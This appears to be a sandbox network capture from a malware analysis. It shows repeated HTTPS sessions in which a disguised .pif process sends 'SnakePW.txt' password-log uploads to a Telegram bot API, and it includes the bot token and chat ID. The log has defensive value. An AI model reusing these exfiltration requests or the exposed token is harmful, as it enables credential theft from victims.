Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.8 | 49758 | 149.154.167.220 | 443 | 3428 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:31:39 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd20718558b20c
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
2024-12-18 15:31:39 UTC | 535 | OUT
                                                                                                        Data Ascii: --------------------------8dd20718558b20cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
2024-12-18 15:31:39 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:39 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:39 UTC | 515 | IN
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419108,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535899,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.8 | 49759 | 149.154.167.220 | 443 | 7064 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:31:39 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd201d8285f219
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
2024-12-18 15:31:39 UTC | 535 | OUT
                                                                                                        Data Ascii: --------------------------8dd201d8285f219Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
                                                                                                        2024-12-18 15:31:40 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:40 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:40 UTC | 515 | IN |
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419110,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535900,"documen


                                                                                                        Session ID: 47 | Source IP: 192.168.2.8 | Source Port: 49760 | Destination IP: 149.154.167.220 | Destination Port: 443 | PID: 6760 | Process: C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        2024-12-18 15:31:40 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd20e3c6ae2bb6
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:40 UTC | 535 | OUT |
                                                                                                        Data Ascii: --------------------------8dd20e3c6ae2bb6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:31:40 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:40 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:40 UTC | 515 | IN |
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419112,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535900,"documen


                                                                                                        Session ID: 48 | Source IP: 192.168.2.8 | Source Port: 49761 | Destination IP: 149.154.167.220 | Destination Port: 443 | PID: 3428 | Process: C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        2024-12-18 15:31:41 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd20859c831fbc
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:41 UTC | 535 | OUT |
                                                                                                        Data Ascii: --------------------------8dd20859c831fbcContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
                                                                                                        2024-12-18 15:31:41 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:41 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:41 UTC | 515 | IN |
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419114,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535901,"documen


                                                                                                        Session ID: 49 | Source IP: 192.168.2.8 | Source Port: 49763 | Destination IP: 149.154.167.220 | Destination Port: 443 | PID: 7064 | Process: C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        2024-12-18 15:31:41 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd202f16a5978c
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:41 UTC | 535 | OUT |
                                                                                                        Data Ascii: --------------------------8dd202f16a5978cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
                                                                                                        2024-12-18 15:31:42 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:42 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:42 UTC | 515 | IN |
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419116,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535902,"documen


                                                                                                        Session ID: 50 | Source IP: 192.168.2.8 | Source Port: 49764 | Destination IP: 149.154.167.220 | Destination Port: 443 | PID: 6760 | Process: C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        2024-12-18 15:31:42 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd20f8ada3c59e
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:42 UTC | 535 | OUT |
                                                                                                        Data Ascii: --------------------------8dd20f8ada3c59eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:31:42 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:42 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:42 UTC | 515 | IN |
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419118,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535902,"documen


                                                                                                        Session ID: 51 | Source IP: 192.168.2.8 | Source Port: 49765 | Destination IP: 149.154.167.220 | Destination Port: 443 | PID: 3428 | Process: C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        2024-12-18 15:31:43 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd209da301b406
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:43 UTC | 535 | OUT |
                                                                                                        Data Ascii: --------------------------8dd209da301b406Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
                                                                                                        2024-12-18 15:31:43 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:43 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:43 UTC | 515 | IN |
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419120,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535903,"documen


                                                                                                        Session ID: 52 | Source IP: 192.168.2.8 | Source Port: 49766 | Destination IP: 149.154.167.220 | Destination Port: 443 | PID: 7064 | Process: C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        2024-12-18 15:31:43 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd2044a7ee04b8
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:43 UTC | 535 | OUT |
                                                                                                        Data Ascii: --------------------------8dd2044a7ee04b8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
                                                                                                        2024-12-18 15:31:44 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:44 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:44 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419122,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535904,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.8 | 49767 | 149.154.167.220 | 443 | 6760 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:31:44 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd21101d4364c8
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:31:44 UTC | 535 | OUT | Data Ascii: --------------------------8dd21101d4364c8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
2024-12-18 15:31:44 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:31:44 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:44 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419124,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535904,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.8 | 49773 | 149.154.167.220 | 443 | 3428 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:31:45 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd20b5944b821b
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:31:45 UTC | 535 | OUT | Data Ascii: --------------------------8dd20b5944b821bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
2024-12-18 15:31:45 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:31:45 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:45 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419126,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535905,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.8 | 49774 | 149.154.167.220 | 443 | 7064 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:31:45 UTC | 352 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd205b7d4f4ac3
Host: api.telegram.org
Content-Length: 535
Connection: Keep-Alive
2024-12-18 15:31:45 UTC | 535 | OUT | Data Ascii: --------------------------8dd205b7d4f4ac3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
2024-12-18 15:31:46 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:31:46 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:46 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419128,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535906,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.8 | 49775 | 149.154.167.220 | 443 | 6760 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:31:46 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd212ca5861b19
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:31:46 UTC | 535 | OUT | Data Ascii: --------------------------8dd212ca5861b19Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
2024-12-18 15:31:47 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:31:46 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:47 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419130,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535906,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.8 | 49781 | 149.154.167.220 | 443 | 3428 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:31:47 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd20cec3117c14
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:31:47 UTC | 535 | OUT | Data Ascii: --------------------------8dd20cec3117c14Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
2024-12-18 15:31:47 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:31:47 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:47 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419132,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535907,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.8 | 49782 | 149.154.167.220 | 443 | 7064 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:31:47 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd2070e745a6df
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:31:47 UTC | 535 | OUT | Data Ascii: --------------------------8dd2070e745a6dfContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
2024-12-18 15:31:48 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:31:48 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:48 UTC | 515 | IN
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419134,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535908,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.8 | 49783 | 149.154.167.220 | 443 | 6760 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:31:48 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd2149110694f3
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
2024-12-18 15:31:48 UTC | 535 | OUT
                                                                                                        Data Ascii: --------------------------8dd2149110694f3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
2024-12-18 15:31:49 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:48 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:49 UTC | 515 | IN
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419136,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535908,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.2.8 | 49788 | 149.154.167.220 | 443 | 3428 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:31:49 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd20e53751f75b
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
2024-12-18 15:31:49 UTC | 535 | OUT
                                                                                                        Data Ascii: --------------------------8dd20e53751f75bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
2024-12-18 15:31:50 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:49 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:50 UTC | 515 | IN
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419138,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535909,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
61 | 192.168.2.8 | 49789 | 149.154.167.220 | 443 | 7064 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:31:49 UTC | 352 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd208793074bc2
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        Connection: Keep-Alive
2024-12-18 15:31:49 UTC | 535 | OUT
                                                                                                        Data Ascii: --------------------------8dd208793074bc2Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
